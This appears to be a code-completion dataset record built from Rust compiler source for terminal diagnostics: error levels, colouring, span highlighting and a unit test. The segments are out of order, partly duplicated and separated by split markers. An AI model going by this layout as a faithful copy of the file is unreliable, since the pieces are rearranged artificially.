fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
/// Write `msg` to `w`, applying `color` when the destination is a
/// color-capable terminal; raw destinations receive the plain bytes.
fn print_maybe_styled(w: &mut EmitterWriter,
                      msg: &str,
                      color: term::attr::Attr) -> io::Result<()> {
    match w.dst {
        Terminal(ref mut t) => {
            try!(t.attr(color));
            // If `msg` ends in a newline, we need to reset the color before
            // the newline. We're making the assumption that we end up writing
            // to a `LineBufferedWriter`, which means that emitting the reset
            // after the newline ends up buffering the reset until we print
            // another line or exit. Buffering the reset is a problem if we're
            // sharing the terminal with any other programs (e.g. other rustc
            // instances via `make -jN`).
            //
            // Note that if `msg` contains any internal newlines, this will
            // result in the `LineBufferedWriter` flushing twice instead of
            // once, which still leaves the opportunity for interleaved output
            // to be miscolored. We assume this is rare enough that we don't
            // have to worry about it.
            if msg.ends_with("\n") {
                try!(t.write_all(msg[..msg.len()-1].as_bytes()));
                try!(t.reset());
                try!(t.write_all(b"\n"));
            } else {
                try!(t.write_all(msg.as_bytes()));
                try!(t.reset());
            }
            Ok(())
        }
        Raw(ref mut w) => w.write_all(msg.as_bytes()),
    }
}
/// Print one diagnostic header line: `topic lvl: msg [code]`.
///
/// `topic` is usually a "file:linenum" prefix (empty for locationless
/// diagnostics). The level label is colored per `Level::color` and the
/// message is bolded when the destination is a terminal.
fn print_diagnostic(dst: &mut EmitterWriter, topic: &str, lvl: Level,
                    msg: &str, code: Option<&str>) -> io::Result<()> {
    if !topic.is_empty() {
        try!(write!(&mut dst.dst, "{} ", topic));
    }
    try!(print_maybe_styled(dst,
                            &format!("{}: ", lvl),
                            term::attr::ForegroundColor(lvl.color())));
    // `msg` is already a &str; pass it through without re-formatting.
    try!(print_maybe_styled(dst, msg, term::attr::Bold));
    // An error code, when present, is appended in bright magenta;
    // `rustc --explain <code>` accepts it verbatim.
    if let Some(code) = code {
        let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
        try!(print_maybe_styled(dst, &format!(" [{}]", code), style));
    }
    try!(write!(&mut dst.dst, "\n"));
    Ok(())
}
/// Default `Emitter` that renders human-readable diagnostics to a
/// terminal or raw writer.
pub struct EmitterWriter {
    dst: Destination,
    // Long-description registry consulted for the `--explain` hint.
    registry: Option<diagnostics::registry::Registry>
}
/// Where diagnostics are written: a color-capable terminal, or any
/// plain `Write` sink (no styling applied).
enum Destination {
    Terminal(Box<term::Terminal<WriterWrapper> + Send>),
    Raw(Box<Write + Send>),
}
impl EmitterWriter {
    /// Build an emitter writing to stderr; `color_config` decides
    /// whether ANSI styling is attempted (`Auto` probes for a tty).
    pub fn stderr(color_config: ColorConfig,
                  registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
        let stderr = io::stderr();
        let use_color = match color_config {
            Always => true,
            Never => false,
            Auto => stderr_isatty(),
        };
        if use_color {
            // `term::stderr()` can fail (e.g. unknown TERM); fall back
            // to unstyled output in that case.
            let dst = match term::stderr() {
                Some(t) => Terminal(t),
                None => Raw(Box::new(stderr)),
            };
            EmitterWriter { dst: dst, registry: registry }
        } else {
            EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
        }
    }
    /// Build an emitter writing unstyled output to an arbitrary sink.
    pub fn new(dst: Box<Write + Send>,
               registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
        EmitterWriter { dst: Raw(dst), registry: registry }
    }
}
/// True when stderr is attached to a tty (drives the `Auto` color choice).
#[cfg(unix)]
fn stderr_isatty() -> bool {
    unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
/// True when stderr is a console handle (drives the `Auto` color choice).
/// `GetConsoleMode` returns 0 for redirected/piped handles.
#[cfg(windows)]
fn stderr_isatty() -> bool {
    // -12 is the documented Win32 constant for STD_ERROR_HANDLE.
    const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
    extern "system" {
        fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
        fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
                          lpMode: libc::LPDWORD) -> libc::BOOL;
    }
    unsafe {
        let handle = GetStdHandle(STD_ERROR_HANDLE);
        let mut out = 0;
        GetConsoleMode(handle, &mut out) != 0
    }
}
// Delegate the `Write` interface to whichever backend is active.
impl Write for Destination {
    fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
        match *self {
            Terminal(ref mut t) => t.write(bytes),
            Raw(ref mut w) => w.write(bytes),
        }
    }
    fn flush(&mut self) -> io::Result<()> {
        match *self {
            Terminal(ref mut t) => t.flush(),
            Raw(ref mut w) => w.flush(),
        }
    }
}
impl Emitter for EmitterWriter {
    fn emit(&mut self,
            cmsp: Option<(&codemap::CodeMap, Span)>,
            msg: &str, code: Option<&str>, lvl: Level) {
        // Diagnostics attached to COMMAND_LINE_SP have no source text to
        // quote, so they render as a bare file/line-style header.
        let result = match cmsp {
            Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
                                                FileLine(COMMAND_LINE_SP),
                                                msg, code, lvl),
            Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
            None => print_diagnostic(self, "", lvl, msg, code),
        };
        if let Err(e) = result {
            panic!("failed to print diagnostics: {:?}", e);
        }
    }
    fn custom_emit(&mut self, cm: &codemap::CodeMap,
                   sp: RenderSpan, msg: &str, lvl: Level) {
        if let Err(e) = emit(self, cm, sp, msg, None, lvl) {
            panic!("failed to print diagnostics: {:?}", e);
        }
    }
}
/// Shared rendering path for span diagnostics: print the header line,
/// then the source excerpt appropriate for the `RenderSpan` variant,
/// then any macro-expansion backtrace and `--explain` hint.
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
        msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
    let sp = rsp.span();
    // We cannot check equality directly with COMMAND_LINE_SP
    // since PartialEq is manually implemented to ignore the ExpnId
    let ss = if sp.expn_id == COMMAND_LINE_EXPN {
        "<command line option>".to_string()
    } else if let EndSpan(_) = rsp {
        // EndSpan cites the end position: collapse to a zero-width span
        // at `hi` before stringifying.
        let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
        cm.span_to_string(span_end)
    } else {
        cm.span_to_string(sp)
    };
    try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
    match rsp {
        FullSpan(_) => {
            try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
            try!(print_macro_backtrace(dst, cm, sp));
        }
        EndSpan(_) => {
            try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
            try!(print_macro_backtrace(dst, cm, sp));
        }
        Suggestion(_, ref suggestion) => {
            try!(highlight_suggestion(dst, cm, sp, suggestion));
            try!(print_macro_backtrace(dst, cm, sp));
        }
        FileLine(..) => {
            // no source text in this case!
        }
    }
    // If the code has a registered long-form description, tell the user
    // how to view it.
    match code {
        Some(code) =>
            match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
                Some(_) => {
                    try!(print_diagnostic(dst, &ss[..], Help,
                                          &format!("run `rustc --explain {}` to see a detailed \
                                                    explanation", code), None));
                }
                None => ()
            },
        None => (),
    }
    Ok(())
}
fn highlight_suggestion(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
suggestion: &str)
-> io::Result<()>
{
let lines = cm.span_to_lines(sp).unwrap();
assert!(!lines.lines.is_empty());
// To build up the result, we want to take the snippet from the first
// line that precedes the span, prepend that with the suggestion, and
// then append the snippet from the last line that trails the span.
let fm = &lines.file;
let first_line = &lines.lines[0];
let prefix = fm.get_line(first_line.line_index)
.map(|l| &l[..first_line.start_col.0])
.unwrap_or("");
let last_line = lines.lines.last().unwrap();
let suffix = fm.get_line(last_line.line_index)
.map(|l| &l[last_line.end_col.0..])
.unwrap_or("");
let complete = format!("{}{}{}", prefix, suggestion, suffix);
// print the suggestion without any line numbers, but leave
// space for them. This helps with lining up with previous
// snippets from the actual error being reported.
let fm = &*lines.file;
let mut lines = complete.lines();
for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
let elided_line_num = format!("{}", line_index+1);
try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
fm.name, "", elided_line_num.len(), line));
}
// if we elided some lines, add an ellipsis
if lines.next().is_some() {
let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
"", fm.name.len(), elided_line_num.len())); |
/// Print up to MAX_LINES source lines covered by `sp`, each prefixed
/// with "file:linenum", plus a `^~~~`-style underline when the span
/// fits on a single line.
fn highlight_lines(err: &mut EmitterWriter,
                   cm: &codemap::CodeMap,
                   sp: Span,
                   lvl: Level,
                   lines: codemap::FileLinesResult)
                   -> io::Result<()>
{
    let lines = match lines {
        Ok(lines) => lines,
        Err(_) => {
            try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
            return Ok(());
        }
    };
    let fm = &*lines.file;
    // Bail out quietly if any line's text is unavailable.
    let line_strings: Option<Vec<&str>> =
        lines.lines.iter()
                   .map(|info| fm.get_line(info.line_index))
                   .collect();
    let line_strings = match line_strings {
        None => { return Ok(()); }
        Some(line_strings) => line_strings
    };
    // Display only the first MAX_LINES lines.
    let all_lines = lines.lines.len();
    let display_lines = cmp::min(all_lines, MAX_LINES);
    let display_line_infos = &lines.lines[..display_lines];
    let display_line_strings = &line_strings[..display_lines];
    // Calculate the widest number to format evenly and fix #11715
    assert!(display_line_infos.len() > 0);
    let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
    let mut digits = 0;
    while max_line_num > 0 {
        max_line_num /= 10;
        digits += 1;
    }
    // Print the offending lines
    for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
        try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
                    fm.name,
                    line_info.line_index + 1,
                    line,
                    width=digits));
    }
    // If we elided something, put an ellipsis.
    if display_lines < all_lines {
        let last_line_index = display_line_infos.last().unwrap().line_index;
        let s = format!("{}:{} ", fm.name, last_line_index + 1);
        try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
    }
    // FIXME (#3260)
    // If there's one line at fault we can easily point to the problem
    if lines.lines.len() == 1 {
        let lo = cm.lookup_char_pos(sp.lo);
        let mut digits = 0;
        let mut num = (lines.lines[0].line_index + 1) / 10;
        // how many digits must be indent past?
        while num > 0 { num /= 10; digits += 1; }
        let mut s = String::new();
        // Skip is the number of characters we need to skip because they are
        // part of the 'filename:line ' part of the previous line.
        let skip = fm.name.chars().count() + digits + 3;
        for _ in 0..skip {
            s.push(' ');
        }
        if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
            let mut col = skip;
            let mut lastc = ' ';
            let mut iter = orig.chars().enumerate();
            for (pos, ch) in iter.by_ref() {
                lastc = ch;
                if pos >= lo.col.to_usize() { break; }
                // Whenever a tab occurs on the previous line, we insert one on
                // the error-point-squiggly-line as well (instead of a space).
                // That way the squiggly line will usually appear in the correct
                // position.
                match ch {
                    '\t' => {
                        col += 8 - col%8;
                        s.push('\t');
                    },
                    _ => {
                        col += 1;
                        s.push(' ');
                    },
                }
            }
            try!(write!(&mut err.dst, "{}", s));
            // Build the `^~~~` underline itself.
            let mut s = String::from("^");
            let count = match lastc {
                // Most terminals have a tab stop every eight columns by default
                '\t' => 8 - col%8,
                _ => 1,
            };
            col += count;
            s.extend(::std::iter::repeat('~').take(count));
            let hi = cm.lookup_char_pos(sp.hi);
            if hi.col != lo.col {
                // Extend the squiggles to cover the rest of the span.
                for (pos, ch) in iter {
                    if pos >= hi.col.to_usize() { break; }
                    let count = match ch {
                        '\t' => 8 - col%8,
                        _ => 1,
                    };
                    col += count;
                    s.extend(::std::iter::repeat('~').take(count));
                }
            }
            if s.len() > 1 {
                // One extra squiggly is replaced by a "^"
                s.pop();
            }
            try!(print_maybe_styled(err,
                                    &format!("{}\n", s),
                                    term::attr::ForegroundColor(lvl.color())));
        }
    }
    Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
                       cm: &codemap::CodeMap,
                       sp: Span,
                       lvl: Level,
                       lines: codemap::FileLinesResult)
                       -> io::Result<()> {
    let lines = match lines {
        Ok(lines) => lines,
        Err(_) => {
            try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
            return Ok(());
        }
    };
    let fm = &*lines.file;
    let lines = &lines.lines[..];
    if lines.len() > MAX_LINES {
        // Too long: show only the first and last lines with "..." between.
        if let Some(line) = fm.get_line(lines[0].line_index) {
            try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
                        lines[0].line_index + 1, line));
        }
        try!(write!(&mut w.dst, "...\n"));
        let last_line_index = lines[lines.len() - 1].line_index;
        if let Some(last_line) = fm.get_line(last_line_index) {
            try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
                        last_line_index + 1, last_line));
        }
    } else {
        for line_info in lines {
            if let Some(line) = fm.get_line(line_info.line_index) {
                try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
                            line_info.line_index + 1, line));
            }
        }
    }
    // Build the arrow line pointing at the last byte of the span.
    let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
    let hi = cm.lookup_char_pos(sp.hi);
    let skip = last_line_start.chars().count();
    let mut s = String::new();
    for _ in 0..skip {
        s.push(' ');
    }
    if let Some(orig) = fm.get_line(lines[0].line_index) {
        let iter = orig.chars().enumerate();
        for (pos, ch) in iter {
            // Span seems to use half-opened interval, so subtract 1
            // NOTE(review): `hi.col` of 0 would underflow here -- presumably
            // rendered spans always end past column 0; confirm.
            if pos >= hi.col.to_usize() - 1 { break; }
            // Whenever a tab occurs on the previous line, we insert one on
            // the error-point-squiggly-line as well (instead of a space).
            // That way the squiggly line will usually appear in the correct
            // position.
            match ch {
                '\t' => s.push('\t'),
                _ => s.push(' '),
            }
        }
    }
    s.push('^');
    s.push('\n');
    print_maybe_styled(w,
                       &s[..],
                       term::attr::ForegroundColor(lvl.color()))
}
/// Recursively print "in expansion of ..." and "expansion site" notes
/// for every macro-expansion level that produced `sp`, walking outward
/// through call sites.
fn print_macro_backtrace(w: &mut EmitterWriter,
                         cm: &codemap::CodeMap,
                         sp: Span)
                         -> io::Result<()> {
    let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
        match expn_info {
            Some(ei) => {
                let ss = ei.callee.span.map_or(String::new(),
                                               |span| cm.span_to_string(span));
                // Decorate the callee name like its invocation syntax:
                // #[attr], name!, or bare for compiler expansions.
                let (pre, post) = match ei.callee.format {
                    codemap::MacroAttribute => ("#[", "]"),
                    codemap::MacroBang => ("", "!"),
                    codemap::CompilerExpansion => ("", ""),
                };
                try!(print_diagnostic(w, &ss, Note,
                                      &format!("in expansion of {}{}{}",
                                               pre,
                                               ei.callee.name,
                                               post),
                                      None));
                let ss = cm.span_to_string(ei.call_site);
                try!(print_diagnostic(w, &ss, Note, "expansion site", None));
                Ok(Some(ei.call_site))
            }
            None => Ok(None)
        }
    }));
    // The call site may itself come from an expansion; recurse outward.
    cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
/// Unwrap `opt`, or abort with an internal compiler error whose message
/// is produced lazily by `msg`.
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
    M: FnOnce() -> String,
{
    if let Some(value) = opt {
        value
    } else {
        diag.handler().bug(&msg())
    }
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> { Ok(()) }
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
} | }
Ok(())
} | random_line_split |
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
/// (Shared by the highlight/suggestion renderers below.)
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
    /// A FullSpan renders with an initial line for the message,
    /// prefixed by file:linenum, followed by a summary of
    /// the source code covered by the span.
    FullSpan(Span),
    /// Similar to a FullSpan, but the cited position is the end of
    /// the span, instead of the start. Used, at least, for telling
    /// compiletest/runtest to look at the last line of the span
    /// (since `end_highlight_lines` displays an arrow to the end
    /// of the span).
    EndSpan(Span),
    /// A Suggestion renders with an initial line for the
    /// message, prefixed by file:linenum, followed by a summary
    /// of hypothetical source code, where the `String` is spliced
    /// into the lines in place of the code covered by the span.
    Suggestion(Span, String),
    /// A FileLine renders with just a line for the message prefixed
    /// by file:linenum.
    FileLine(Span),
}
impl RenderSpan {
    /// The span this rendering refers to, regardless of variant.
    fn span(&self) -> Span {
        match *self {
            FullSpan(s) => s,
            Suggestion(s, _) => s,
            EndSpan(s) => s,
            FileLine(s) => s,
        }
    }
}
/// When to colorize diagnostic output.
#[derive(Clone, Copy)]
pub enum ColorConfig {
    Auto,    // color iff stderr is attached to a terminal
    Always,
    Never
}
/// Sink for rendered diagnostics.
pub trait Emitter {
    /// Emit `msg` at `lvl`, optionally citing a source span and error code.
    fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
            msg: &str, code: Option<&str>, lvl: Level);
    /// Emit with an explicit rendering style for the span.
    fn custom_emit(&mut self, cm: &codemap::CodeMap,
                   sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
/// `#[must_use]` forces callers to acknowledge (propagate or panic on) it.
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
// Rendered when a FatalError panic payload is displayed.
impl fmt::Display for FatalError {
    fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
        write!(f, "parser fatal error")
    }
}
impl error::Error for FatalError {
    fn description(&self) -> &str {
        "The parser has encountered a fatal error"
    }
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
/// Used as a panic payload so unwinders can distinguish ICEs.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
// Rendered when an ExplicitBug panic payload is displayed.
impl fmt::Display for ExplicitBug {
    fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
        write!(f, "parser internal bug")
    }
}
impl error::Error for ExplicitBug {
    fn description(&self) -> &str {
        "The parser has encountered an internal bug"
    }
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
    pub handler: Handler,     // underlying span-less diagnostics machinery
    pub cm: codemap::CodeMap, // used to resolve spans to file:line text
}
impl SpanHandler {
    pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
        SpanHandler {
            handler: handler,
            cm: cm,
        }
    }
    /// Emit a fatal error at `sp`; the caller is expected to propagate
    /// (and eventually panic on) the returned `FatalError`.
    pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
        self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
        return FatalError;
    }
    pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
        self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
        return FatalError;
    }
    /// Emit a (non-fatal) error at `sp` and bump the error count.
    pub fn span_err(&self, sp: Span, msg: &str) {
        self.handler.emit(Some((&self.cm, sp)), msg, Error);
        self.handler.bump_err_count();
    }
    pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
        self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
        self.handler.bump_err_count();
    }
    pub fn span_warn(&self, sp: Span, msg: &str) {
        self.handler.emit(Some((&self.cm, sp)), msg, Warning);
    }
    pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
        self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
    }
    pub fn span_note(&self, sp: Span, msg: &str) {
        self.handler.emit(Some((&self.cm, sp)), msg, Note);
    }
    /// Note pointing at the *end* of `sp` rather than its start.
    pub fn span_end_note(&self, sp: Span, msg: &str) {
        self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
    }
    pub fn span_help(&self, sp: Span, msg: &str) {
        self.handler.emit(Some((&self.cm, sp)), msg, Help);
    }
    /// Prints out a message with a suggested edit of the code.
    ///
    /// See `diagnostic::RenderSpan::Suggestion` for more information.
    pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
        self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
    }
    /// Note rendered as a bare "file:line" header (no source excerpt).
    pub fn fileline_note(&self, sp: Span, msg: &str) {
        self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
    }
    pub fn fileline_help(&self, sp: Span, msg: &str) {
        self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
    }
    /// Report an internal compiler error at `sp`; unwinds with `ExplicitBug`.
    pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
        self.handler.emit(Some((&self.cm, sp)), msg, Bug);
        panic!(ExplicitBug);
    }
    pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
        self.span_bug(sp, &format!("unimplemented {}", msg));
    }
    /// Access the underlying (span-less) handler.
    pub fn handler<'a>(&'a self) -> &'a Handler {
        &self.handler
    }
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
    err_count: Cell<usize>,             // errors emitted so far
    emit: RefCell<Box<Emitter + Send>>, // sink for rendered diagnostics
    pub can_emit_warnings: bool
}
impl Handler {
    /// Construct a Handler printing to stderr with the given color policy.
    pub fn new(color_config: ColorConfig,
               registry: Option<diagnostics::registry::Registry>,
               can_emit_warnings: bool) -> Handler {
        let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
        Handler::with_emitter(can_emit_warnings, emitter)
    }
    /// Construct a Handler around an arbitrary emitter.
    pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
        Handler {
            err_count: Cell::new(0),
            emit: RefCell::new(e),
            can_emit_warnings: can_emit_warnings
        }
    }
    /// Emit a fatal diagnostic, then unwind with `FatalError`.
    pub fn fatal(&self, msg: &str) -> ! {
        self.emit.borrow_mut().emit(None, msg, None, Fatal);
        panic!(FatalError);
    }
    /// Emit an error and bump the error count.
    pub fn err(&self, msg: &str) {
        self.emit.borrow_mut().emit(None, msg, None, Error);
        self.bump_err_count();
    }
    pub fn bump_err_count(&self) {
        self.err_count.set(self.err_count.get() + 1);
    }
    pub fn err_count(&self) -> usize {
        self.err_count.get()
    }
    pub fn has_errors(&self) -> bool {
        self.err_count.get() > 0
    }
    /// Abort (via `fatal`) if any errors have been recorded.
    pub fn abort_if_errors(&self) {
        let s;
        match self.err_count.get() {
            0 => return,
            1 => s = "aborting due to previous error".to_string(),
            _ => {
                s = format!("aborting due to {} previous errors",
                            self.err_count.get());
            }
        }
        self.fatal(&s[..]);
    }
    pub fn warn(&self, msg: &str) {
        self.emit.borrow_mut().emit(None, msg, None, Warning);
    }
    pub fn note(&self, msg: &str) {
        self.emit.borrow_mut().emit(None, msg, None, Note);
    }
    pub fn help(&self, msg: &str) {
        self.emit.borrow_mut().emit(None, msg, None, Help);
    }
    /// Report an internal compiler error; unwinds with `ExplicitBug`.
    pub fn bug(&self, msg: &str) -> ! {
        self.emit.borrow_mut().emit(None, msg, None, Bug);
        panic!(ExplicitBug);
    }
    pub fn unimpl(&self, msg: &str) -> ! {
        self.bug(&format!("unimplemented {}", msg));
    }
    /// Forward a diagnostic to the emitter; warnings are suppressed
    /// when `can_emit_warnings` is false.
    pub fn emit(&self,
                cmsp: Option<(&codemap::CodeMap, Span)>,
                msg: &str,
                lvl: Level) {
        if lvl == Warning && !self.can_emit_warnings { return }
        self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
    }
    pub fn emit_with_code(&self,
                          cmsp: Option<(&codemap::CodeMap, Span)>,
                          msg: &str,
                          code: &str,
                          lvl: Level) {
        if lvl == Warning && !self.can_emit_warnings { return }
        self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
    }
    pub fn custom_emit(&self, cm: &codemap::CodeMap,
                       sp: RenderSpan, msg: &str, lvl: Level) {
        if lvl == Warning && !self.can_emit_warnings { return }
        self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
    }
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
fn print_maybe_styled(w: &mut EmitterWriter,
msg: &str,
color: term::attr::Attr) -> io::Result<()> {
match w.dst {
Terminal(ref mut t) => {
try!(t.attr(color));
// If `msg` ends in a newline, we need to reset the color before
// the newline. We're making the assumption that we end up writing
// to a `LineBufferedWriter`, which means that emitting the reset
// after the newline ends up buffering the reset until we print
// another line or exit. Buffering the reset is a problem if we're
// sharing the terminal with any other programs (e.g. other rustc
// instances via `make -jN`).
//
// Note that if `msg` contains any internal newlines, this will
// result in the `LineBufferedWriter` flushing twice instead of
// once, which still leaves the opportunity for interleaved output
// to be miscolored. We assume this is rare enough that we don't
// have to worry about it.
if msg.ends_with("\n") {
try!(t.write_all(msg[..msg.len()-1].as_bytes()));
try!(t.reset());
try!(t.write_all(b"\n"));
} else {
try!(t.write_all(msg.as_bytes()));
try!(t.reset());
}
Ok(())
}
Raw(ref mut w) => w.write_all(msg.as_bytes()),
}
}
fn print_diagnostic(dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
pub struct EmitterWriter {
dst: Destination,
registry: Option<diagnostics::registry::Registry>
}
enum Destination {
Terminal(Box<term::Terminal<WriterWrapper> + Send>),
Raw(Box<Write + Send>),
}
impl EmitterWriter {
pub fn stderr(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
let stderr = io::stderr();
let use_color = match color_config {
Always => true,
Never => false,
Auto => stderr_isatty(),
};
if use_color {
let dst = match term::stderr() {
Some(t) => Terminal(t),
None => Raw(Box::new(stderr)),
};
EmitterWriter { dst: dst, registry: registry }
} else {
EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
}
}
pub fn new(dst: Box<Write + Send>,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
EmitterWriter { dst: Raw(dst), registry: registry }
}
}
#[cfg(unix)]
